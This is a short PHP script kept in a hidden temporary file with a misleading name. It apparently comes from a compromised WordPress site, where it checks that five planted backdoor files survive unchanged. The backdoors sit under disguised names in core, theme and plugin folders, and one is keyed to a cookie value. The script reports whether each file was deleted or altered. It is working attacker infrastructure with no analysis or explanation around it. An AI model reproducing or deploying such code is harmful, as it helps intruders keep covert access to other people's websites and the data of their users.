File: //var/tmp/.ibase_pconnection
<?php $r = '/home/dh_h5prje/obidigital.org'; $x = ["/wp-includes/class-wp-http-curl.php"=>"bd@@207316@@_COOKIE[3]",
"/wp-content/plugins/gallery_1748028130/paqe.php"=>"bd@@263202@@727",
"/wp-content/themes/top_1747416584/connents.php"=>"bd@@1126@@1166",
"/wp-content/plugins/wpforms-lite/templates/admin/payments/single/details.php"=>"bd@@378039@@Feature-Policy",
"/86dd87.php"=>"bd@@24026@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');